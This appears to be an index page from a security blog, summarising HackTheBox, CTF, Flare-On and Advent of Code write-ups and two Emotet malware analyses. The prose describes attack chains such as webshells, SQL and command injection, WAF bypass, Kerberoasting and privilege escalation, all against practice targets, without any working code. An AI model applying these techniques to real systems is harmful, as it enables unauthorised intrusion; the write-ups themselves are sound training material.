Player involved a lot of recon, and pulling together pieces to go down multiple different paths to user and root. I’ll start identifying and enumerating four different virtual hosts. Eventually I’ll find a backup file with PHP source on one, and use it to get access to a private area. From there, I can use a flaw in FFMPEG to leak videos that contain the text contents of various files on Player. I can use that information to get credentials where I can SSH, but only with a very limited shell. However, I can use an SSH exploit to get code execution that provides limited and partial file read, which leads to more credentials. Those credentials are good for a Codiad instance running on another of the virtual hosts, which allows me to get a shell as www-data. There’s a PHP script running as a cron as root that I can exploit either by overwriting a file include, or by writing serialized PHP data. In Beyond Root, I’ll look at two more altnerative paths, one jumping right to shell against Codiad, and the other bypassing lshell.
Holiday Hack 2019: KringleCon2ctf sans-holiday-hack
The 2019 SANS Holiday Hack Challenge presented a twisted take on how a villain, the Tooth Fairy, tried to take down Santa and ruin Christmas. It all takes place at the second annual Kringle Con, where the worlds leading security practitioners show up to hear talks and solve puzzles. Hosted at Elf-U, this years conference included 14 talks from leaders in information security, as well as 11 terminals / in-game puzzles and 13 objectives to figure out. In solving all of these, the Tooth Fairy’s plot was foiled, and Santa was able to deliver presents on Christmas. As usual, the challenges were interesting and set up in such a way that it was very beginner friendly, with lots of hints and talks to ensure that you learned something while solving. While last year really started the trend of defensive themed challenges, 2019 had a ton of interesting defensive challenges, with hands on with machine learning as well as tools like Splunk and Graylog.
HTB: Bitlabhackthebox ctf htb-bitlab nmap bookmark javascript obfuscation webshell git gitlab docker ping-sweep chisel tunnel psql credentials ssh reverse-engineering ida x64dbg git-hooks reverse-engineering oscp-plus
Bitlab was a box centered around automation of things, even if the series challenges were each rather unrealistic. It starts with a Gitlab instance where the help link has been changed to give access to javascript encoded credentials. Once logged in, I have access to the codebase for the custom profile pages use in this instance, and there’s automation in place such that when I merge a change into master, it goes live right away. So I can add a webshell and get access to the box. In the database, I’ll find the next users credentials for SSH access. For Root, I’ll reverse engineer a Windows executable which is executing Putty with credentials, and use those creds to get root. In Beyond Root, I’ll look at an unintended path from www-data to root using git hooks, and explore a call to
GetUserNameWthat is destined to fail.
HTB: Crafthackthebox ctf htb-craft nmap gogs api wfuzz flask python python-eval git ssh vault-project jwt john jwtcat
Craft was a really well designed medium box, with lots of interesting things to poke at, none of which were too difficult. I’ll find credentials for the API in the Gogs instance, as well as the API source, which allows me to identify a vulnerability in the API that gives code execution. Then I’ll use the shell on the API container to find creds that allow me access to private repos back on Gogs, which include an SSH key. With SSH access to the host, I’ll target the vault project software to get SSH access as root. In Beyond Root, I’ll look at the JWT, and my failed attempts to crack the secret.
Hackvent 2019 - leetctf hackvent arduino hex-file avr-simulator binascii python burp php john ghidra arm ioctl reverse-engineering
There were only three leet challenges, but they were not trivial, and IOT focused. First, I’ll reverse a Arduino binary from hexcode. Then, there’s a web hacking challenge that quickly morphs into a crypto challenge, which I can solve by reimplementing the leaked PRNG from Ida Pro to generate a valid password. Finally, there’s a firmware for a Broadcom wireless chip that I’ll need to find the hooked ioctl function and pull the flag from it.
Hackvent 2019 - Hardctf hackvent websocket mqtt cve-2017-7650 x32dbg patching unicode php sql mach-o deb ghidra salsa20 crypto emojicode ps4 ecc reverse-engineering
The hard levels of Hackvent conitnued with more web hacking, reverse engineering, crypto, and an esoteric programming language. In the reversing challenges, there was not only an iPhone debian package, but also a PS4 update file.
Hackvent 2019 - Mediumctf hackvent crypto sql credit-cards rule-30 gimp strace ltrace jwt python vb x32dbg ghidra jsf perl obfuscation deparse reverse-engineering
The medium levels brought the first reverse enginnering challenges, the first web hacking challenges, some image manipulation, and of course, some obfuscated Perl.
Hackvent 2019 - Easyctf hackvent forensics stereolithography stl clara-io aztec-code hodor ahk autohotkey steganography python pil bacon crypto stegsnow base58
Hackvent is a fun CTF, offering challenges that start off quite easy and build to much harder over the course of 24 days, with bonus points for submitting the flag within the first 24 hours for each challenge. This was the first year I made it past day 12, and I was excited to finish all the challenges with all time bonuses! I’ll break the solutions into four parts. The first is the easy challenges, days 1-7, which provided some basic image forensics, some interesting file types, an esoteric programming language, and two hidden flags.
Advent of Code 2019: Day 14ctf advent-of-code python defaultdict
Day 14 is all about stacking requirements and then working them to understand the inputs required to get the output desired. I’ll need to organize my list of reactions in such a way that I can work back from the desired end output to how much ore is required to get there.
HTB: Smasher2htb-smasher2 hackthebox ctf exploit auth-bypass logic-error python reference-counting kernal-driver mmap reverse-engineering
Like the first Smasher, Smasher2 was focused on exploitation. However this one didn’t have a buffer overflow or what I typically think of as binary exploitation. It starts with finding a vulnerability in a compiled Python module (written in C) to get access to an API key. Then I’ll have to bypass a WAF to use that API to get execution and then a shell onSmasher2. For PrivEsc, I’ll need to exploit a kernel driver to get a root shell.
Advent of Code 2019: Day 13ctf advent-of-code python intcode-computer defaultdict
Continuing with the computer, now I’m using it to power an arcade game. I’ll use the given intcodes to run the game, and I’m responsible for moving the joystick via input to the game. This challenge was awesome. I made a video of the game running in my terminal, which wasn’t necessary, but turned out pretty good.
Advent of Code 2019: Day 12ctf advent-of-code python
Day 12 asks me to look at moons and calculate their positions based on a simplified gravity between them. In the first part, I’ll run the system for 1000 steps and return a calculation (“energy”) based on each moons position and velocity at that point. In the second part, I’ll have to find when the positions repeat, which I can do by recognizing that the three axes are independent of each other, and that I can find the cycle time for each axis, and then find the least common multiple of them to get when all three are in order.
Advent of Code 2019: Day 11ctf advent-of-code python intcode-computer defaultdict
Continuing with the computer, now I’m using it to power a robot. My robot will walk around, reading the current color, submitting that to the program, and getting back the color to paint the current square and instructions for where to move next.
Advent of Code 2019: Day 10ctf advent-of-code python
This challenge gives me a map of asteroids. I’ll need to play with different ways to find which ones are directly in the path of others, first to see which asteroids can see the most others, and then to destroy them one by one with a laser.
Advent of Code 2019: Day 9ctf advent-of-code python intcode-computer defaultdict
More computer work in day 9, this time adding what is kind of a stack pointer and an opcode to adjust that pointer. Now I can add a relative address mode, getting positions relative to the stack pointer.
Advent of Code 2019: Day 8ctf advent-of-code python
After spending hours on day 7, I finished day 8 in about 15 minutes. It was simply reading in a series of numbers which represented pixels in various layers in an email. In part one I’ll break the pixels into layers, and evaluate each one. In part two, I’ll actually create the image.
Advent of Code 2019: Day 7ctf advent-of-code python intcode-computer
The computer is back again, and this time, I’m chaining it and using it as an amplifier. In the each part, I’ll find the way to get maximum thrust from five amplifiers given that each can take one of five given phases. In part two, there’s a loop of amplification.
HTB: Wallhackthebox ctf htb-wall nmap gobuster hydra centreon cve-2019-13024 waf filter python uncompyle screen modsecurity htaccess htb-flujab
Wall presented a series of challenges wrapped around two public exploits. The first exploit was a CVE in Centreon software. But to find it, I had to take advantage of a misconfigured webserver that only requests authenticatoin on GET requests, allowing POST requests to proceed, which leads to the path to the Centreon install. Next, I’ll use the public exploit, but it fails because there’s a WAF blocking requests with certain keywords. I’ll probe to identify the blocks workds, which includes the space character, and use the Linux environment variable ${IFS} instead of space to get command injection. Once I have that, I can get a shell on the box. There’s a compiled Python file in the users home directory, which I can decompile to find the password for the second user. From either of these users, I can exploit SUID screen to get a root shell. In Beyond Root, I’ll look at the webserver configuration, the WAF, improve the exploit script, and look at some trolls the author left around.
Advent of Code 2019: Day 6ctf advent-of-code python recursion defaultdict
This was a fun challenge, because it seemed really hard at first, but once I figured out how to think about it, it was quite simple. I’m given a set of pairings, each of which contains two objects, the second orbits around the first. I’ll play with counting the number of orbits going on, as well as working a path through the orbits. This was the first time I brought out recurrisive programming this year, and it really fit well.
Advent of Code 2019: Day 5ctf advent-of-code python intcode-computer
Today I’m tasked with building on the simple computer I built in day 2. I’ll add new instructions for input / output and comparisons / branching. I’ll also get parameter modes, so in addition to reading values from other positions, I can now handle constants (known in computer architecture as immediates).
Advent of Code 2019: Day 4ctf advent-of-code python
I solved day 4 much faster than day 3, probably because it moved away from spacial reasoning and just into input validation. I’m given a range of 6-digit numbers, and asked to pick ones that meet certain criteria.
Advent of Code 2019: Day 3ctf advent-of-code python
I always start to struggle when AOC moves into spacial challenges, and this is where the code starts to get a bit ugly. In this challenge, I have to think about two wires moving across a coordinate plane, and look for positions where they intersect. Then I’ll score each intersection, first by Manhattan distance to the origin, and then by total number of steps from the origin along both wires, and return the minimum.
Advent of Code 2019: Day 2ctf advent-of-code python intcode-computer
This puzzle is to implement a little computer with three op codes, add, multiply, and finish. In the first part, I’m given two starting register values, 12 and 2. In the second part, I need to brute force those values to find a given target output.
Advent of Code 2019: Day 1ctf advent-of-code python
This puzzle was basically reading a list of numbers, performing some basic arithmetic, and summing the results. For part two, there’s a twist in that I’ll need to do that same math on the results, and add then as long as they are greater than 0.
HTB: Heistctf hackthebox htb-heist nmap cisco john cisco-type-7 smbclient smbmap crackmapexec rpcclient ipc lookupsids evil-winrm powershell docker firefox procdump out-minidump mimikittenz credentials
Heist brought new concepts I hadn’t seen on HTB before, yet keep to the easy difficulty. I’ll start by find a Cisco config on the website, which has some usernames and password hashes. After recovering the passwords, I’ll find that one works to get RPC access, which I’ll use to find more usernames. One of those usernames with one of the original passwords works to get a WinRM session on the Heist. From there, I’ll notice that Firefox is running, and dump the process memory to find the password for the original website, which is also the administrator password for the box.
LD_PRELOAD Rootkit on Chainsawhtb-chainsaw ctf hackthebox rootkit ldpreload ida nm strace reverse-engineering ghidra.
HTB: Chainsawhtb-chainsaw ctf hackthebox nmap ftp solididy python web3 remix command-injection injection ipfs ssh email john path-hijack suid bmap df debugfs ida ghidra pyinstaller reverse-engineering
Chainsaw was centered around blockchain and smart contracts, with a bit of InterPlanetary File System thrown in. I’ll get the details of a Solididy smart contract over an open FTP server, and find command injection in it to get a shell. I’ll find an SSH key for the bobby user in IPFS files. bobby has access to a SUID binary that I can interact with two ways to get a root shell. But even as root, the flag is hidden, so I’ll have to dig into the slack space around root.txt to find the flag. In Beyond root, I’ll look at the ChainsawClub binaries to see how they apply the same Web3 techniques I used to get into the box in the first place.
HTB: Networkedctf htb-networked hackthebox nmap apache dirsearch php upload webshell filter command-injection sudo ifcfg oscp-like
Networked involved abusing an Apache misconfiguration that allowed me to upload an image containing a webshell with a double extension. With that, I got a shell as www-data, and then did two privescs. The first abused command injection into a script that was running to clean up the uploads directory. Then I used access to an ifcfg script to get command execution as root. In Beyond Root, I’ll look a bit more at that Apache configuration.
HTB: Jarvisctf htb-jarvis hackthebox nmap waf gobuster sqli injection sqlmap phpmyadmin cve-2018-12613 python systemctl service gtfobins command-injection oscp-like
Jarvis provide three steps that were all relatively basic. First, there’s an SQL injection with a WAF that breaks
sqlmap, at least in it’s default configuration. Then there’s a command injection into a Python script. And finally there’s creating a malicious service. In Beyond root, I’ll look at the WAF and the cleanup script.
HTB: Haystackhackthebox ctf htb-haystack gobuster steganography elasticsearch ssh kibana cve-2018-17246 javascript lfi logstash herokuapp
Haystack wasn’t a realistic pentesting box, but it did provide insight into tools that are common on the blue side of things with Elastic Stack. I’ll find a hint in an image on a webpage, an use that to find credentials in an elastic search instance. Those creds allow SSH access to Haystack, and access to a local Kibana instance. I’ll use a CVE against Kibana to get execution as kibana. From there, I have access to the LogStash config, which is misconfigured to allow a execution via a properly configured log as root.
HTB: Safehtb-safe ctf hackthebox rop pwntools bof python exploit keepass kpcli john htb-redcross htb-ellingson
Safe was two steps - a relatively simple ROP, followed by cracking a Keepass password database. Personally I don’t believe binary exploitation belongs in a 20-point box, but it is what it is. I’ll show three different ROP strategies to get a shell.
HTB: Ellingsonhtb-ellingson hackthebox ctf nmap werkzeug python flask debugger ssh bash hashcat credentials bof rop pwntools aslr gdb peda ret2libc checksec pattern-create onegadget cron htb-october htb-redcross
Ellingson was a really solid hard box. I’ll start with ssh and http open, and find that they’ve left the Python debugger running on the webpage, giving me the opporutunity to execute commands. I’ll use that access to write my ssh key to the authorized_keys file, and get a shell as hal. I’ll find that hal has access to the shadow.bak file, and from there, I can break margo’s password. Once sshed in as margo, I will find a suid binary that I can overflow to get a root shell. In Beyond Root, I’ll explore two cronjobs. The first breaks the privesc from hal to margo, resetting the permissions on the shadow.bak file to a safe configuration. The second looks like a hint that was disabled, or maybe forgotten.
HTB: Writeuphtb-writeup ctf hackthebox nmap cmsms sqli credentials injection
Writeup was a great easy box. Neither of the steps were hard, but both were interesting. To get an initial shell, I’ll exploit a blind SQLI vulnerability in CMS Made Simple to get credentials, which I can use to log in with SSH. From there, I’ll abuse access to the staff group to write code to a path that’s running when someone SSHes into the box, and SSH in to trigger it. In Beyond Root, I’ll look at other ways to try to hijack the root process.
Flare-On 2019: woprflare-on ctf flare-on-wopr python pyinstaller python-exe-unpacker uncompyle pdb exe z3 reverse-engineering
wopr was like an onion - the layers kept peeling back revealing more layers. I’m given an exe which was created by PyInstaller, which I’ll unpack to get to the Python code. That code has a layer of unpacking based on a binary implementation of tabs and spaces in the doc strings. Once I get to the next layer, I need to calculate the hash of the text segment for the currently running binary, and use that as a key to some equations. Using a solver to solve the system, I can find the input necessary to return the flag.
Flare-On 2019: bmphideflare-on ctf flare-on-bmphide dnspy dotnet anti-debug steganography reverse-engineering
bmphide was my favorite challenge this year (that I got to). It was challenging, yet doable and interesting. I’m given a bitmap image and a Windows .NET executable. That executable is used to hide information in the low bits of the image. I’ll have to reverse the exe to understand how to extract the data. I’ll also have to work around some anti-debug.
Flare-On 2019: demoflare-on ctf flare-on-demo x64dbg reverse-engineering
demo really threw me, to the point that I almost skipped writing it up. The file given is a demoscene, which is a kind of competition to get the best visual performce out of an executable limited in size. To achieve this, packers are used to compress the binary. In the exe for this challenge, a 3D Flare logo comes up and spins, but the flag is missing. I’ll have to unpack the binary and start messing with random DirectX functions until I find two ways to make the flag show up.
HTB: Ghoulhackthebox htb-ghoul ctf nmap gobuster hydra zipslip tomcat docker ssh pivot cewl john gogs tunnel gogsownz credentials suid git ssh-agent-hijack cron htb-reddish
Ghoul was a long box, that involved pioviting between multiple docker containers exploiting things and collecting information to move to the next step. With a level of pivoting not seen in HackTheBox since Reddish, I’ll need to pay careful attention to various passwords and other bits of information as I move through the containers. I’ll exploit a webapp using the ZipSlip vulnerability to get a webshell up and get a shell as www-data, only to find that the exploited webserver is running as root, and with another ZipSlip, I can escalte to root. Still with no flags, I’ll crack an ssh key and pivot to the second container. From there, I can access a third container hosting the self hosted git solution, gogs. With some password reuse and the gogsownz exploit, I’ll get a shell on that container, and use a suid binary to get root. That provides access to a git repo that has a password I can use for root on the second container. As root, I can see ssh sessions connecting through this container and to the main host using ssh agent forwarding, and I’ll hijack that to get root on the final host. In beyond root, I’ll explore the ssh situation on the final host and get myself persistence, look at the crons running to simulate the user using ssh agent forwarding, and show a network map of the entire system.
Flare-On 2019: DNS Chessflare-on ctf flare-on-dnschess peda gdb wireshark python dns ida reverse-engineering
DNS Chess was really fun. I’m given a pcap, and elf executable, and an elf shared library. The two binaries form a game of chess, where commands are sent to an AI over DNS. I’ll need to figure out how to spoof valid moves by reversing the binary, and then use valid moves to win the game.
Flare-On 2019: Flarebearflare-on ctf flare-on-flarebear apk genymotion android jadx algebra reverse-engineering
Flarebear wsa the first Android challenge, and I’m glad to see it at the beginning while it’s still not too hard. I’ll use GenyMotion cloud to emunlate the application, and then jadx to decompile it and see what the win condition is. Once I find that, I can get the flag.
Flare-On 2019: Overlongflare-on ctf flare-on-overlong x64dbg reverse-engineering
Overlong was a challenge that could lead to complex rabbit holes, or, with some intelligent guess work, be solved quite quickly. From the start, with the title and the way that the word overlong was bolded in the prompt, I was looking for an integer to overflow or change in some way. That, plus additional clues, made this one pretty quick work.
HTB: SwagShopctf hackthebox htb-swagshop nmap magento gobuster deserialization webshell sudo oscp-like
SwagShop was a nice beginner / easy box centered around a Magento online store interface. I’ll use two exploits to get a shell. The first is an authentication bypass that allows me to add an admin user to the CMS. Then I can use an authenticated PHP Object Injection to get RCE. I’ll also show how got RCE with a malicious Magento package. RCE leads to shell and user. To privesc to root, it’s a simple exploit of
sudo vi.
Flare-On 2019: Memecat Battlestation [Shareware Demo Edition]flare-on ctf flare-on-memecat-battlestation dnspy dotnet reverse-engineering
Memecat Battlestation [Shareware Demo Edition] was a really simple challenge that really involed opening a .NET executable in a debugger and reading the correct phrases from the code. It was a good beginner challenge.
HTB: Kryptosctf hackthebox htb-kryptos nmap gobuster php burp mysql wireshark hashcat rc4 crypto python python-cmd disable-functions sqli webshell sqlite vimcrypt ssh tunnel python-eval filter
Kryptos feels different from most insane boxes. It brought an element of math / crypt into most of the challenges in a way that I really enjoyed. But it still layered challenges so that each step involved multiple exploits / bypasses, like all good insane boxes do. I’ll start by getting access to a web page by telling the page to validate logins against a database on my box. The website gives me that ability to return encrypted webpage content that Kryptos can retrieve. I’ll break the encryption to access pages I’m not able to access on my own, finding a sqlite test page that I can inject into to write a webshell that can access the file system. With file system access, I’ll retrieve a Vim-crypted password backup, and crack that to get ssh access to the system. On the system, I’ll access an API available only on localhost and take advantage of a weak random number generator to sign my own commands, bypassing python protections to get code execution as root.
HTB: Lukehackthebox ctf htb-luke nmap gobuster credentials api nodejs jwt wfuzz ajenti hydra
Luke was a recon heavy box. In fact, the entire writeup for Luke could reasonably go into the Recon section. I’m presented with three different web interfaces, which I enumerate and bounce between to eventually get credentials for an Ajenti administrator login. Once I’m in Ajenti, I have access to a root shell, and both flags.
HTB: Holidayctf htb-holiday hackthebox nmap nodejs gobuster dirsearch burp xss filter sqli command-injection npm sudo oswe-plus
Holiday was a fun, hard, old box. The path to getting a shell involved SQL injection, cross site scripting, and command injection. The root was a bit simpler, taking advantage of a sudo on node package manager install to install a malicious node package.
HTB: Bastionhtb-bastion hackthebox ctf nmap smbmap smbclient smb vhd mount guestmount secretsdump crackstation ssh windows mremoteng oscp-like
Bastion was a solid easy box with some simple challenges like mounting a VHD from a file share, and recovering passwords from a password vault program. It starts, somewhat unusually, without a website, but rather with vhd images on an SMB share, that, once mounted, provide access to the registry hive necessary to pull out credentials. These creds provide the ability to ssh into the host as the user. To get administrator access, I’ll exploit the mRemoteNG installation, pulling the profile data and encrypted data, and show several ways to decrypt those. Once I break out the administrator password, I can ssh in as administrator.
HTB: OneTwoSevenctf htb-onetwoseven hackthebox nmap sftp tunnel ssh chroot vim crackstation php webshell apt mitm
OneTwoSeven was a very cleverly designed box. There were lots of steps, some enumeration, all of which was do-able and fun. I’ll start by finding a hosting provider that gives me SFTP access to their system. I’ll use that to tunnel into the box, and gain access to the admin panel. I’ll find creds for that using symlinks over SFTP. From there, I’ll exploit a logic error in the plugin upload to install a webshell. To get root, I’ll take advantage of my user’s ability to run apt update and apt upgrade as root, and man-in-the-middle the connection to install a backdoored package.
HTB: Unattendedctf htb-unattended hackthebox nmap gobuster sqli sqlmap nginx nginx-aliases lfi session-poisoning socat hidepid noexec mysql initrd cpio ida reverse-engineering oswe-like
Users rated Unattended much harder than the Medium rating it was released under. I think that’s because the SQLI vulnerability was easy to find, but dumping the database would take forever. So the trick was knowing when to continue looking and identify the NGINX vulnerability to leak the source code. At that point, the SQLI was much more manageable, providing LFI which I used with PHP session variables to get RCE and a shell. From there, it was injecting into some commands being taken from the database to move to the next user. And in the final step, examining an initrd file to get the root password. In Beyond Root, I’ll reverse the binary that generates the password, and give some references for initrd backdoors.
HTB: Helplinectf hackthebox htb-helpline nmap manageengine servicedesk default-creds excel cve-2017-9362 xxe responder cve-2017-11511 lfi hashcat
Helpline was a really difficult box, and it was an even more difficult writeup. It has so many paths, and yet all were difficult in some way. It was also one that really required Windows as an attack platform to do the intended way. I got lucky in that this was the box I had chosen to try out Commando VM. Give the two completely different attack paths on Windows and Kali, I’ll break this into three posts. In the first post, I’ll do enumeration up to an initial shell. Then in one post I’ll show how I solved it from Commando (Windows) using the intended paths. In the other post, I’ll show how to go right to a shell as SYSTEM, and work backwards to get the root flag and eventually the user flag.
HTB: Arkhamctf hackthebox htb-arkham nmap gobuster faces jsf deserialization smb smbclient smbmap luks bruteforce-luks cryptsetup hmac htb-canape ysoserial python burp crypto nc http.server smbserver ost readpst mbox mutt pssession rlwrap winrm chisel evil-winrm uac meterpreter greatsct msbuild metasploit cmstp systempropretiesadvanced dll mingw32 oswe-plus htb-sizzle
In my opinion, Arkham was the most difficult Medium level box on HTB, as it could have easily been Hard and wouldn’t have been out of place at Insane. But it is still a great box. I’ll start with an encrypted LUKZ disk image, which I have to crack. On it I’ll find the config for a Java Server Faces (JSF) site, which provides the keys that allow me to perform a deserialization attack on the ViewState, providing an initial shell. I’ll find an email file with the password for a user in the administrators group. Once I have that shell, I’ll have to bypass UAC to grab root.txt.
HTB: Fortunectf htb-fortune hackthebox certificate certificate-authority sslyze command-injection burp burp-repeater firewall python python-cmd authpf openssl ssh nfs pgadmin postgresql credentials sqlite pfctl tcpdump htb-lacasadepapel
Fortune was a different kind of insane box, focused on taking advantage things like authpf and nfs. I’ll start off using command injection to find a key and certificate that allow access to an HTTPS site. On that site, I get instructions and an ssh key to connect via authpf, which doesn’t provide a shell, but opens up new ports in the firewall. From there I can find nfs access to
/home, which I can use with uid spoofing to get ssh access. For privesc, I’ll find credentials in pgadmin’s database which I can use to get a root shell. In Beyond Root, I’ll look the firewall configuration and why I couldn’t turn command injection into a shell.
Bypassing PHP disable_functions with Chankroctf hackthebox htb-lacasadepapel chankro php disable-functions htb-hackback
I was reading Alamot’s LaCasaDePapel writeup, and they went a different way once they got the php shell. Instead of just using the php functions to find the certificate and key needed to read the private members https page, Alamot uses Chankro to bypass the disabled execution functions and run arbitrary code anyway. I had to try it.
HTB: LaCasaDePapelhackthebox htb-lacasadepapel ctf vsftpd searchsploit python psy php disable-functions certificate client-certificate openssl directory-traversal lfi ssh pspy supervisord cron metasploit ida iptables js certificate-authority reverse-engineering oscp-plus youtube
LaCasaDePapel was a fun easy box that required quite a few steps for a 20 point box, but none of which were too difficult. I’ll start off exploiting a classic backdoor bug in VSFTPd 2.3.4 which has been modified to return a shell in Psy, a php based debugging tool. From there, I can collect a key file which I’ll use to sign a client certificate, gaining access to the private website. I’ll exploit a path traversal bug in the site to get an ssh key for one of the users. To privesc, I’ll find a file that’s controlling how a cron is being run by root. The file is not writable and owned by root, but sits in a directory my current user owns, which allows me to delete the file and then create a new one. In Beyond Root, I’ll look at the modified VSFTPd server and show an alternative path that allows me to skip the certificate generation to get access to the private website.
HTB: CTFctf htb-ctf hackthebox nmap ldap ldap-injection second-order second-order-ldap-injection python-cmd python totp stoken 7z listfile wildcard htb-nightmare htb-stratosphere
CTF was hard in a much more straight-forward way than some of the recent insane boxes. It had steps that were difficult to pull off, and not even that many. But it was still quite challenging. I’ll start using ldap injection to determine a username and a seed for a one time password token. Then I’ll use that to log in. On seeing a command page, I’ll need to go back and log-in again, this time with a username that allows me a second-order ldap injection to bypass the user check. Once I do, I can run commands, and find a user password in the php pages. With an SSH shell, I’ll find a backup script that uses Sevenzip in a way that I can hijack to read the root flag. In Beyond root, I’ll look at little bit at SELinux, build a small shell to make running commands over the webpage easier, and look at the actual ldap queries I injected into.
HTB: FriendZonehtb-friendzone ctf hackthebox nmap smbmap smbclient gobuster zone-transfer dns dig lfi php wfuzz credentials ssh pspy python-library-hijack oscp-like
FriendZone was a relatively easy box, but as far as easy boxes go, it had a lot of enumeration and garbage trolls to sort through. In all the enumeration, I’ll find a php page with an LFI, and use SMB to read page source and upload a webshell. I’ll uprivesc to the next user with creds from a database conf file, and then to root using a writable python module to exploit a root cron job calling a python script.
HTB: Hackbackctf hackthebox htb-hackback nmap wfuzz jq gophish php disable-functions aspx rot13 javascript gobuster tio-run log-poisoning python python-cmd regeorge winrm proxychains cron named-pipe seimpersonate command-injection service arbitrary-write diaghub visual-studio dll alternative-data-streams webshell rdesktop rdp oswe-plus htb-flujab
Hackback is the hardest box that I’ve done on HTB. By far. Without question. If you’d like data to back that up, the first blood times of over 1.5 and 2.5 days! I remember vividly working on this box with all my free time, and being the 5th to root it (7th root counting the two box authors) in the 6th day. I’ll start by finding a hosts whose main attack point is a GoPhish interface. This interface gives up some domain names for fake phishing sites on the same host, which I can use to find an admin interface which I can abuse to get file system access via log poisoning. Unfortunately, all the functions I need to get RCE via PHP or ASPX are disabled. I can however upload reGeorge and use it to tunnel a connection to WinRM, where I can use some creds I find in a config file. I’ll then use a named pipe to execute nc as the next user. From there I can abuse a faulty service that allows me to write as SYSTEM wherever I want to overwrite a file in SYSTEM32, and then use DiagHub to get a SYSTEM shell. In Beyond Root, I’ll look at an unintended way to get root.txt as hacker, explore why an aspx webshell fails and find a work around to get it working, check out the PowerShell source for the web server listening on 6666, and look into an RDP connection.
Darling: Running MacOS Binaries on Linuxtools bsides-london ctf darling python mach-o macos
`
I attended BSides London almost a month ago now, and of course took a look at the CTF. There were a handful of reversing challenges, but multiple of them were MacOS (Mach-O) binaries. As I looked down at my Windows laptop and my Kali VM, I felt at a bit of a disadvantage. While I was able to solve one of the challenges just with IDA, I went looking for a way to run Mac binaries on a Linux OS. And I found Darwin. It took basically the rest of the day to install, so I didn’t get to any of the additional challenges, but I am happy to be semi-equiped the next time the need comes up.
HTB: Netmonhtb-netmon hackthebox ctf nmap ftp password-reuse prtg command-injection psexec-py oscp-plus htb-jerry
Netmon rivals Jerry and Blue for the shortest box I’ve done. The user first blood went in less than 2 minutes, and that’s probably longer than it should have been as the hackthebox page crashed right at open with so many people trying to submit flags. The host presents the full file system over anonymous FTP, which is enough to grab the user flag. It also hosts an instance of PRTG Network Monitor on port 80. I’ll use the FTP access to find old creds in a backup configuration file, and use those to guess the current creds. From there, I can use a command injection vulnerability in PRTG to get a shell as SYSTEM, and the root flag.
HTB: Querierctf htb-querier hackthebox nmap windows smb smbclient olevba macros vba mssql mssqlclient xp-dirtree net-ntlmv2 responder hashcat xpcmdshell powerup gpp smbserver nc wmiexec service oscp-plus htb-giddy
Querier was a fun medium box that involved some simple document forensices, mssql access, responder, and some very basic Windows Privesc steps. I’ll show how to grab the Excel macro-enabled workbook from an open SMB share, and find database credentials in the macros. I’ll use those credentials to connect to the host’s MSSQL as a limited user. I can use that limited access to get a Net-NTLMv2 hash with responder, which provides enough database access to run commands. That’s enough to provide a shell. For privesc, running PowerUp.ps1 provides administrator credentials from a GPP file. In Beyond Root, I’ll look at the other four things that PowerUp points out, and show how one of them will also provide a shell as SYSTEM.
HTB: FluJabhtb-flujab ctf hackthebox nmap openssl wfuzz cookies python scripting sqli injection python-cmd python ajenti ssh cve-2008-0166 tcp-wrapper rbash gtfobins make screen arbitrary-write
FluJab was a long and difficult box, with several complicated steps which require multiple pieces working together and careful enumeration. I’ll start by enumerating a host that hosts websites for many different customers, and is meant to be like a CloudFlare ip. Once identifying the host I’m targeting, I’ll find some weird cookie values that I can manipulate to get access to configuration pages. There I can configure the SMTP to go through my host, and use an SQL injection in one of the forms where I can read the results over email. Information in the database credentials and new subdomain, where I can access an instance of Ajenti server admin panel. That allows me to identify weak ssh keys, and to add my host to an ssh TCP Wrapper whitelist. Then I can ssh in with the weak private key. From there, I’ll find a vulnerable version of screen which I can use to get a root shell. In Beyond Root, I’ll show an unintended path to get a shell through Ajenti using the API, look at the details of the screen exploit, explore the box’s clean up crons, and point out an oddity with nurse jackie.
HTB: Helphtb-help hackthebox ctf nmap graphql curl crackstation gobuster helpdeskz searchsploit exploit-db sqli blindsqli sqlmap ssh credentials filter php webshell exploit cve-2017-16995 cve-2017-5899 oswe-like
Help was an easy box with some neat challenges. As far as I can tell, most people took the unintended route which allowed for skipping the initial section. I’ll either enumerate a GraphQL API to get credentials for a HelpDeskZ instance. I’ll use those creds to exploit an authenticated SQLi vulnerability and dump the database. In the database, I’ll find creds which work to ssh into the box. Alternatively, I can use an unauthenticated upload bypass in HelpDeskZ to upload a webshell and get a shell from there. For root, it’s kernel exploits.
HTB: Sizzlehackthebox htb-sizzle ctf nmap gobuster smbmap smbclient smb ftp regex regex101 responder scf net-ntlmv2 hashcat ldapdomaindump ldap certsrv certificate firefox openssl winrm constrained-language-mode psbypassclm metasploit meterpreter installutil msbuild msfvenom kerberoast tunnel rubeus chisel bloodhound smbserver dcsync secretsdump crackmapexec wmiexec cron ntlm-http burp htb-active htb-reel certificate-authority client-certificate oscp-plus adcs htb-giddy htb-bighead
I loved Sizzle. It was just a really tough box that reinforced Windows concepts that I hear about from pentesters in the real world. I’ll start with some SMB access, use a .scf file to capture a users NetNTLM hash, and crack it to get creds. From there I can create a certificate for the user and then authenticate over WinRM. I’ll Kerberoast to get a second user, who is able to run the DCSync attack, leading to an admin shell. I’ll have two beyond root sections, the first to show two unintended paths, and the second to exploit NTLM authentication over HTTP, and how Burp breaks it.
HTB: Chaoshtb-chaos ctf hackthebox nmap webmin gobuster wordpress wpscan imap openssl roundcube wfuzz crypto python latex pdftex rbash gtfobins tar password-reuse firefox
Choas provided a couple interesting aspects that I had not worked with before. After some web enumeration and password guessing, I found myself with webmail credentials, which I could use on a webmail domain or over IMAP to get access to the mailbox. In the mailbox was an encrypted message, that once broken, directed me to a secret url where I could exploit an instance of pdfTeX to get a shell. From there, I used a shared password to switch to another user, performed an restricted shell escape, and found the root password in the user’s firefox saved passwords. That password was actually for a Webmin instance, which I’ll exploit in Beyond Root.
Malware Analysis: Pivoting In VTmalware emotet olevba oledump powershell virustotal
After pulling apart an Emotet phishing doc in the previous post, I wanted to see if I could find similar docs from the same phishing campaign, and perhaps even different docs from previous phishing campaigns based on artifacts in the seed document. With access to a paid VirusTotal account, this is not difficult to do.
Malware Analysis: Unnamed Emotet Docmalware emotet olevba oledump powershell virustotal cyberchef urlscan
I decided to do some VT roulette and check out some recent phishing docs in VT. I searched for documents with only few (5-12) detections, and the top item was an Emotet word doc. The Emotet group continues to tweak their strategy to avoid AV. In this doc, they use TextBox objects to hold both the base64 encoded PowerShell and the PowerShell command line itself, in a way that actually makes it hard to follow with olevba. I’ll use oledump to show the parts that olevba misses.
